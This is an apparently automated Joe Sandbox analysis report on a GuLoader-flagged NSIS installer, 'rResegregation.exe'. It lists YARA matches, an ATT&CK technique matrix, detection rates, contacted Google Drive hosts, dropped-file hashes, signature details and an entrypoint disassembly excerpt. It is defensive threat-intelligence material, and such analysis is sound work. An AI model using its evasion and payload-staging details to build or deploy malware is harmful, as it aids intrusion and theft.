        Source: Yara match | File source: 00000004.00000002.33362897827.0000000006590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000005.00000002.30433716160.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000005.00000002.30433631570.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        Remote Access Functionality

        Source: Yara match | File source: 00000002.00000002.28913678466.0000000037460000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000004.00000002.33362897827.0000000006590000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000005.00000002.30433716160.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000005.00000002.30433631570.0000000003020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 1 Access Token Manipulation | 11 Masquerading | OS Credential Dumping | 21 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
        Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 312 Process Injection | 2 Virtualization/Sandbox Evasion | LSASS Memory | 2 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Clipboard Data | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Access Token Manipulation | Security Account Manager | 2 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 312 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 3 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Obfuscated Files or Information | Cached Domain Credentials | 3 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
        DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery

        Source | Detection | Scanner | Label | Link
        rResegregation.exe | 45% | ReversingLabs | Win32.Trojan.Guloader |

        Source | Detection | Scanner | Label | Link
        C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll | 0% | ReversingLabs | |
        C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\nsExec.dll | 0% | ReversingLabs | |

        No Antivirus matches

        No Antivirus matches

        Source | Detection | Scanner | Label | Link
        http://www.quovadis.bm0 | 0% | Avira URL Cloud | safe |
        https://ocsp.quovadisoffshore.com0 | 0% | Avira URL Cloud | safe |
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | 0% | Avira URL Cloud | safe |
        http://www.gopher.ftp://ftp. | 0% | Avira URL Cloud | safe |
        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference. | 0% | Avira URL Cloud | safe |

        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        drive.google.com | 172.217.12.142 | true | false | | high
        drive.usercontent.google.com | 142.250.72.225 | true | false | | high

        Name | Source | Malicious | Antivirus Detection | Reputation
        https://www.google.com | rResegregation.exe, 00000002.00000003.28725893919.000000000759B000.00000004.00000020.00020000.00000000.sdmp | false | | high
        http://nsis.sf.net/NSIS_Error | rResegregation.exe, rResegregation.exe, 00000000.00000000.28284554839.0000000000409000.00000008.00000001.01000000.00000003.sdmp, rResegregation.exe, 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmp, rResegregation.exe, 00000002.00000000.28610022706.0000000000409000.00000008.00000001.01000000.00000003.sdmp, winrshost.exe, 00000005.00000002.30433362648.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp | false | | high
        https://drive.google.com/ | rResegregation.exe, 00000002.00000002.28900231862.0000000007530000.00000004.00000020.00020000.00000000.sdmp | false | | high
        https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214 | rResegregation.exe, 00000002.00000001.28611627933.0000000000649000.00000020.00000001.01000000.00000008.sdmp | false | Avira URL Cloud: safe | unknown
        http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference. | rResegregation.exe, 00000002.00000001.28611627933.0000000000649000.00000020.00000001.01000000.00000008.sdmp | false | Avira URL Cloud: safe | unknown
        https://drive.usercontent.google.com/9 | rResegregation.exe, 00000002.00000003.28749617304.000000000759A000.00000004.00000020.00020000.00000000.sdmp | false | | high
        http://www.quovadis.bm0 | rResegregation.exe, 00000002.00000003.28725893919.000000000759B000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28749617304.000000000759A000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781478297.0000000007598000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781317697.0000000007597000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        https://drive.usercontent.google.com/ | rResegregation.exe, 00000002.00000003.28749617304.000000000759A000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781478297.0000000007598000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781317697.0000000007597000.00000004.00000020.00020000.00000000.sdmp | false | | high
        https://apis.google.com | rResegregation.exe, 00000002.00000003.28725893919.000000000759B000.00000004.00000020.00020000.00000000.sdmp | false | | high
        http://nsis.sf.net/NSIS_ErrorError | rResegregation.exe, 00000000.00000000.28284554839.0000000000409000.00000008.00000001.01000000.00000003.sdmp, rResegregation.exe, 00000000.00000002.28750936798.0000000000409000.00000004.00000001.01000000.00000003.sdmp, rResegregation.exe, 00000002.00000000.28610022706.0000000000409000.00000008.00000001.01000000.00000003.sdmp, winrshost.exe, 00000005.00000002.30433362648.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp | false | | high
        https://ocsp.quovadisoffshore.com0 | rResegregation.exe, 00000002.00000003.28725893919.000000000759B000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28749617304.000000000759A000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781478297.0000000007598000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781317697.0000000007597000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
        http://www.gopher.ftp://ftp. | rResegregation.exe, 00000002.00000001.28611627933.0000000000649000.00000020.00000001.01000000.00000008.sdmp | false | Avira URL Cloud: safe | unknown
        https://drive.usercontent.google.com/2 | rResegregation.exe, 00000002.00000003.28749617304.000000000759A000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781478297.0000000007598000.00000004.00000020.00020000.00000000.sdmp, rResegregation.exe, 00000002.00000003.28781317697.0000000007597000.00000004.00000020.00020000.00000000.sdmp | false | | high

        IP | Domain | Country | ASN | ASN Name | Malicious
        172.217.12.142 | drive.google.com | United States | 15169 | GOOGLEUS | false
        142.250.72.225 | drive.usercontent.google.com | United States | 15169 | GOOGLEUS | false

                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1400163
                            Start date and time:2024-02-28 13:23:33 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 17m 32s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                            Run name:Suspected Instruction Hammering
                            Number of analysed new started processes analysed:5
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:3
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:rResegregation.exe
                            Detection:MAL
                            Classification:mal84.troj.evad.winEXE@5/9@2/2
                            EGA Information:
                            • Successful, ratio: 75%
                            HCA Information:
                            • Successful, ratio: 70%
                            • Number of executed functions: 62
                            • Number of non-executed functions: 290
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                            • Exclude process from analysis (whitelisted): dllhost.exe
                            • Excluded domains from analysis (whitelisted): ecs.office.com
                            • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtEnumerateKey calls found.
                            • Report size getting too big, too many NtOpenKey calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: rResegregation.exe

        Time | Type | Description
        13:27:13 | API Interceptor | 10142868x Sleep call for process: winrshost.exe modified

                            No context
                            No context
                            No context

        Match | Associated Sample Name / URL | Detection | Threat Name | Context
        37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.Program.Unwanted.5399.28168.2681.exe | malicious | Unknown | 142.250.72.225, 172.217.12.142
        37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.Program.Unwanted.5399.28168.2681.exe | malicious | Unknown | 142.250.72.225, 172.217.12.142
        37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.FileRepMalware.29389.28556.exe | malicious | Unknown | 142.250.72.225, 172.217.12.142
        37f463bf4616ecd445d4a1937da06e19 | SecuriteInfo.com.FileRepMalware.29389.28556.exe | malicious | Unknown | 142.250.72.225, 172.217.12.142
        37f463bf4616ecd445d4a1937da06e19 | Booking Information ##208.exe | malicious | GuLoader, Remcos | 142.250.72.225, 172.217.12.142
        37f463bf4616ecd445d4a1937da06e19 | file.exe | malicious | Vidar | 142.250.72.225, 172.217.12.142
        37f463bf4616ecd445d4a1937da06e19 | Confirm!!. PDF.exe | malicious | FormBook, PureLog Stealer | 142.250.72.225, 172.217.12.142
        37f463bf4616ecd445d4a1937da06e19 | Salary - Letter _2024pdf.exe | malicious | AgentTesla, GuLoader | 142.250.72.225, 172.217.12.142
        37f463bf4616ecd445d4a1937da06e19 | S-FACTUR@200309940049003tAomUY6Ao.MSI.msi | malicious | Unknown | 142.250.72.225, 172.217.12.142
        37f463bf4616ecd445d4a1937da06e19 | d3NS5H0PLw.exe | malicious | Amadey, RisePro Stealer | 142.250.72.225, 172.217.12.142
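
        Match | Associated Sample Name / URL | Detection | Threat Name | Context
        C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll | W1nnerFree CS2.exe | malicious | LoaderBot, Xmrig |
        C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll | WP.exe | malicious | Unknown |
        C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll | HICAPSConnect_4.0.0.1.exe | malicious | Unknown |
        C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll | TIjRtMJfZA.exe | malicious | Remcos, GuLoader |
        C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll | TIjRtMJfZA.exe | malicious | GuLoader |
        C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll | Request_for_Pricelist_confirmation.xls | malicious | GuLoader |
        C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll | bPYR660y5o.exe | malicious | Azorult, GuLoader |
        C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll | uQP25xP5DH.exe | malicious | GuLoader |
        C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\System.dll | bPYR660y5o.exe | malicious | GuLoader |
        C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\nsExec.dll | INNORIX-Agent.exe | malicious | Unknown |
        C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\nsExec.dll | INNORIX-Agent.exe | malicious | Unknown |
        C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\nsExec.dll | HICAPSConnect_4.0.0.1.exe | malicious | Unknown |
        C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\nsExec.dll | bPYR660y5o.exe | malicious | Azorult, GuLoader |
        C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\nsExec.dll | uQP25xP5DH.exe | malicious | GuLoader |
        C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\nsExec.dll | bPYR660y5o.exe | malicious | GuLoader |
        C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\nsExec.dll | uQP25xP5DH.exe | malicious | GuLoader |
        C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\nsExec.dll | R7MPO3ijgz.exe | malicious | GuLoader |
        C:\Users\user\AppData\Local\Temp\nsoF4B.tmp\nsExec.dll | tNET06vnWS.exe | malicious | GuLoader |
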
                                                                Process:C:\Users\user\Desktop\rResegregation.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):121364
                                                                Entropy (8bit):4.591385986514627
                                                                Encrypted:false
                                                                SSDEEP:1536:MyVCAh2aFi7k5Imyu8o6CNwWlZdXM+S8xRpaCMr0gXjh4EpWeb:TV4aVpyNI9lDS8xbaCMXSTa
                                                                MD5:2F584A06879017E01E8261039A35FB81
                                                                SHA1:1266CDF22FB3C39FFF780D28D7E80235D37C91E0
                                                                SHA-256:65C8039FE5D44D683544C8B044DAF8247DDBDE1A1049410A7294E7370E21A0F3
                                                                SHA-512:A5C238AA036A2DEF1AA417B4ED60EC7466BC7E7A56168B124EA4482EB79FB9EF27EC1C8555B6BA531D7B724828BFEB69BE3571B12617CB75A34E0614F526B1D4
                                                                Malicious:false
                                                                Reputation:low
                                                                Process:C:\Users\user\Desktop\rResegregation.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):257451
                                                                Entropy (8bit):7.758028959639775
                                                                Encrypted:false
                                                                SSDEEP:6144:ykVsh9jrdzuQQjMCzdRXf/aND4iWy7b1m7GKa:ykVsL1upZRX6ND4iWGbMGb
                                                                MD5:E2D0B0BB949F6FF591455CE0A248948D
                                                                SHA1:780ED85EED3C9F495D10B180073FF91304D4E647
                                                                SHA-256:8AFD5755EB6C2A8FA05A0D40B27AF2E4231F09F6176ED9382CBB1DA76B0AEB78
                                                                SHA-512:39F7C6B6950F09D201F73804AC2C14B132228F0BC0A742A29A7FC9E21E92D3C36009E9FBBDB76CAF5F21680C328EC940705DCC5818B6B9A870D04D49617D142B
                                                                Malicious:false
                                                                Reputation:low
                                                                Process:C:\Users\user\Desktop\rResegregation.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):144434
                                                                Entropy (8bit):4.930322413705722
                                                                Encrypted:false
                                                                SSDEEP:3072:7W6ttdRhkvhbiQ+6LxUwih5Nd9PAhUekxpRkDFm8:5h+hf+6G3Nje2pIm8
                                                                MD5:6E6697CCC2A5B888E8D13D4BD3027FA6
                                                                SHA1:6BF4017D1016825F65A2001982DA632CCEBE8595
                                                                SHA-256:6DC937B66FF9E32AD262C966081BF7A1AA38A759491BE863E7AE2E28CC5DA611
                                                                SHA-512:6540116A7E70F21FE601A7E69DF7EF491678C853B7163CC265E74D1D02791EA8091BE467B33892F157B33DFC136D6CE9D8D982BF040DB54452127E40A37505F5
                                                                Malicious:false
                                                                Reputation:low
                                                                Process:C:\Users\user\Desktop\rResegregation.exe
                                                                File Type:ASCII text, with very long lines (342), with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):409
                                                                Entropy (8bit):4.316596138966152
                                                                Encrypted:false
                                                                SSDEEP:12:uILfzwCbnN4VsFdzvO/cWJV9Cu/LkozsjsGgCu6:jLEkLR4VmozqngCu6
                                                                MD5:37FADD78CA1A16ACBA1C7C6E63B41790
                                                                SHA1:86D7AC5B3B31FD34C742F97314774C3A8278C5C7
                                                                SHA-256:4938F4211BF8BBA63BBA27B4A2490731AB3E56BC39C4B0997AE27148CB0B10EA
                                                                SHA-512:064537F2C3C471B4439141CBBAB01F3D7423C51DBCCD51C848612857E4532156EC037E4F2AA76A5D5C16D62EBB51C2C63A5614DD323F4639A9084C1CE9BE8092
                                                                Malicious:false
                                                                Preview:vankelmodig egernsund topectomy.tamanaca middlemost phellogen vandskadens soelvskrin plumbaginaceous unpartiality,coddled ableeze gerodermia rvrdiges sukkerlager kvarter.abdullahs kahili producent glike statsfinanserne.selskabsdamers topprisers desegmented tumors dominations paakaldt majkattens brickset drberceller waterboard staaltraadsnet..milliares sydsol exoner surgicotherapy recodifying myggesvrmene..
                                                                Process:C:\Users\user\Desktop\rResegregation.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):197401
                                                                Entropy (8bit):4.943394286855981
                                                                Encrypted:false
                                                                SSDEEP:3072:bkRORodlog6aK0ph0cXf2s/X8BT2vHWt8HSJrUBT0Bg5yLbbubc+OGjK3Eqm:b9oIg6qh02+suT2e5rxgs36HOGjKUqm
                                                                MD5:92741A228B38BD3240CB74D7337AB2B2
                                                                SHA1:56A25F8CB6DF0EBD46F8423B41132D6826EE67E7
                                                                SHA-256:FF913C2B04E11520A2D153E25C305E72984A33CAD0649CF94FC9498862916B2C
                                                                SHA-512:0AD99DAD1D5486B23C425687EFF0902A6F5D8447CC9FB6F03B01AA7AF3F931C4B8E5963D4ABBB9FEDDA5C5809C8E615CE3A93A4132427EAE85912CCDB7491267
                                                                Malicious:false
                                                                Process:C:\Users\user\Desktop\rResegregation.exe
                                                                File Type:data
                                                                Category:dropped
                                                                Size (bytes):177692
                                                                Entropy (8bit):4.929126718267887
                                                                Encrypted:false
                                                                SSDEEP:3072:/skvPxa7Rsl3OWreA7lX6/pKJ4Vo/pgUkiCF2nO9I3I5csbyU3e:/skv07Rm35fJEoBLd9O9fcsbTO
                                                                MD5:9A7DED13A5C6C7444E8C563C0621D5BC
                                                                SHA1:8698D3FC40852CC4CDAB3FE885225671895A94FA
                                                                SHA-256:D3EABF84D1FFA658F1ACF8E61875B210839C3242AC5478FECE8E910BC979BB64
                                                                SHA-512:91511DDF50C2E523BCA064793338A47CC3AFBEDE69274CB5F34F5195E81D416C23CC22686FC5AE63A2159ED577B3F5CC127C5CB918E5CFB63D378B2BF9E38E56
                                                                Malicious:false
                                                                Process:C:\Users\user\Desktop\rResegregation.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):11264
                                                                Entropy (8bit):5.770803561213006
                                                                Encrypted:false
                                                                SSDEEP:192:vPtkumJX7zB22kGwfy0mtVgkCPOsE1un:k702k5qpdsEQn
                                                                MD5:2AE993A2FFEC0C137EB51C8832691BCB
                                                                SHA1:98E0B37B7C14890F8A599F35678AF5E9435906E1
                                                                SHA-256:681382F3134DE5C6272A49DD13651C8C201B89C247B471191496E7335702FA59
                                                                SHA-512:2501371EB09C01746119305BA080F3B8C41E64535FF09CEE4F51322530366D0BD5322EA5290A466356598027E6CDA8AB360CAEF62DCAF560D630742E2DD9BCD9
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Joe Sandbox View:
                                                                • Filename: W1nnerFree CS2.exe, Detection: malicious
                                                                • Filename: WP.exe, Detection: malicious
                                                                • Filename: HICAPSConnect_4.0.0.1.exe, Detection: malicious
                                                                • Filename: TIjRtMJfZA.exe, Detection: malicious
                                                                • Filename: TIjRtMJfZA.exe, Detection: malicious
                                                                • Filename: Request_for_Pricelist_confirmation.xls, Detection: malicious
                                                                • Filename: bPYR660y5o.exe, Detection: malicious
                                                                • Filename: uQP25xP5DH.exe, Detection: malicious
                                                                • Filename: bPYR660y5o.exe, Detection: malicious
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L...tc.W...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..`....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\rResegregation.exe
                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):6656
                                                                Entropy (8bit):4.994861218233575
                                                                Encrypted:false
                                                                SSDEEP:96:U7GUxNkO6GR0t9GKKr1Zd8NHYVVHp4dEeY3kRnHdMqqyVgNN3e:mXhHR0aTQN4gRHdMqJVgNE
                                                                MD5:B648C78981C02C434D6A04D4422A6198
                                                                SHA1:74D99EED1EAE76C7F43454C01CDB7030E5772FC2
                                                                SHA-256:3E3D516D4F28948A474704D5DC9907DBE39E3B3F98E7299F536337278C59C5C9
                                                                SHA-512:219C88C0EF9FD6E3BE34C56D8458443E695BADD27861D74C486143306A94B8318E6593BF4DA81421E88E4539B238557DD4FE1F5BEDF3ECEC59727917099E90D2
                                                                Malicious:false
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                Joe Sandbox View:
                                                                • Filename: INNORIX-Agent.exe, Detection: malicious
                                                                • Filename: INNORIX-Agent.exe, Detection: malicious
                                                                • Filename: HICAPSConnect_4.0.0.1.exe, Detection: malicious
                                                                • Filename: bPYR660y5o.exe, Detection: malicious
                                                                • Filename: uQP25xP5DH.exe, Detection: malicious
                                                                • Filename: bPYR660y5o.exe, Detection: malicious
                                                                • Filename: uQP25xP5DH.exe, Detection: malicious
                                                                • Filename: R7MPO3ijgz.exe, Detection: malicious
                                                                • Filename: tNET06vnWS.exe, Detection: malicious
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..7..7..7..7..7,..7..7..7..7..7..7Rich..7........PE..L...rc.W...........!......................... ...............................P.......................................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..,.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                Process:C:\Users\user\Desktop\rResegregation.exe
                                                                File Type:ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):50
                                                                Entropy (8bit):4.351272380112911
                                                                Encrypted:false
                                                                SSDEEP:3:Y0e4nxwKOAXXXUT23:ZxGQUTg
                                                                MD5:70345464BA62A9453DB2F24C1BC10881
                                                                SHA1:62FE4814D1B6082B46C196734B9EAF33B9B691BB
                                                                SHA-256:CC7E912D757A17A09CED10401C69D122B7972D4F9F6E26705E18A8CFE3EBEF40
                                                                SHA-512:B0ED1640898EBF66797489862BE3ACDFF589B161106C688E0536CABD91F673A75126A70B9363B078D8C88144D547DED4E8980E457C8E75E1477AADBB5414AE3A
                                                                Malicious:false
                                                                Preview:[flgevirkningerne]..Blokeringsfrit250=Svaleskabs..
                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                Entropy (8bit):7.657818049367574
                                                                TrID:
                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                File name:rResegregation.exe
                                                                File size:883'592 bytes
                                                                MD5:b64f1f87fdc7e8bd3d053d058fc08f4e
                                                                SHA1:c3ef7dfe21793f4c98a0b98fa0d8e9b4a00a884c
                                                                SHA256:92437485dda44372ed6d0baa2e1ff1593e0d43e5c6ef20918a393d83153a1a94
                                                                SHA512:d3962f5a5c312addfb5649ac1af87b9f9d58439995ae1392cb7ec142b2591dbab370fb0b4897dad748bb4575cfbe63bb93f35c74642ae0e467b3a0453bfd151b
                                                                SSDEEP:12288:uJTQf8fr0Lblkgj88AXVLzmmbj01qfuhheB0GKc2XUJW+QiAukU30+9Ir/CSQf:CTQfgWkk8RRg1qI4qs0Uk+T/G/CJ
                                                                TLSH:DA1512476B95DD57C2A3127489E1E37BA738CEC00D2986435BC02D99BCB2F9E3D8619C
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@............/...........s.../...............+.......Rich............................PE..L....c.W.................^....9....
                                                                Icon Hash:4dcdeced7d5d5823
                                                                Entrypoint:0x4030ec
                                                                Entrypoint Section:.text
                                                                Digitally signed:true
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x5795637F [Mon Jul 25 00:55:27 2016 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:b78ecf47c0a3e24a6f4af114e2d1f5de
                                                                Signature Valid:false
                                                                Signature Issuer:E=jagtkontrollens@Kilokalorie.Fib, O=Stallard, OU="Switchbacker Afgangshaller ", CN=Stallard, L=W\xfcrzburg, S=Bayern, C=DE
                                                                Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                Error Number:-2146762487
                                                                Not Before, Not After
                                                                • 21/01/2024 08:52:39 20/01/2027 08:52:39
                                                                Subject Chain
                                                                • E=jagtkontrollens@Kilokalorie.Fib, O=Stallard, OU="Switchbacker Afgangshaller ", CN=Stallard, L=W\xfcrzburg, S=Bayern, C=DE
                                                                Version:3
                                                                Thumbprint MD5:287B0A10F105EE71A5C0E982BEB5171A
                                                                Thumbprint SHA-1:3C368F2787B907BFA45876449519EEDD2415F859
                                                                Thumbprint SHA-256:ABDEE1435836624C8D806F1D945CCF02FCC2C3529BC3DDC8CF16EC9F47DF13D4
                                                                Serial:582F2139CDE90FD138B7758EA47067A0D1B679C3
                                                                Instruction
                                                                sub esp, 00000184h
                                                                push ebx
                                                                push esi
                                                                push edi
                                                                xor ebx, ebx
                                                                push 00008001h
                                                                mov dword ptr [esp+18h], ebx
                                                                mov dword ptr [esp+10h], 00409198h
                                                                mov dword ptr [esp+20h], ebx
                                                                mov byte ptr [esp+14h], 00000020h
                                                                call dword ptr [004070A8h]
                                                                call dword ptr [004070A4h]
                                                                cmp ax, 00000006h
                                                                je 00007F757CCD0CA3h
                                                                push ebx
                                                                call 00007F757CCD3C11h
                                                                cmp eax, ebx
                                                                je 00007F757CCD0C99h
                                                                push 00000C00h
                                                                call eax
                                                                mov esi, 00407298h
                                                                push esi
                                                                call 00007F757CCD3B8Dh
                                                                push esi
                                                                call dword ptr [004070A0h]
                                                                lea esi, dword ptr [esi+eax+01h]
                                                                cmp byte ptr [esi], bl
                                                                jne 00007F757CCD0C7Dh
                                                                push ebp
                                                                push 00000009h
                                                                call 00007F757CCD3BE4h
                                                                push 00000007h
                                                                call 00007F757CCD3BDDh
                                                                mov dword ptr [007A1F44h], eax
                                                                call dword ptr [00407044h]
                                                                push ebx
                                                                call dword ptr [00407288h]
                                                                mov dword ptr [007A1FF8h], eax
                                                                push ebx
                                                                lea eax, dword ptr [esp+38h]
                                                                push 00000160h
                                                                push eax
                                                                push ebx
                                                                push 0079D500h
                                                                call dword ptr [00407174h]
                                                                push 00409188h
                                                                push 007A1740h
                                                                call 00007F757CCD3807h
                                                                call dword ptr [0040709Ch]
                                                                mov ebp, 007A8000h
                                                                push eax
                                                                push ebp
                                                                call 00007F757CCD37F5h
                                                                push ebx
                                                                call dword ptr [00407154h]
                                                                Programming Language:
                                                                • [EXP] VC++ 6.0 SP5 build 8804
                                                                Name                                  Virtual Address  Virtual Size  Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT          0x7428           0xa0          .rdata
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE        0x3c0000         0x2b038       .rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY        0xd6090          0x1af8        .data
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC       0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT             0x7000           0x298         .rdata
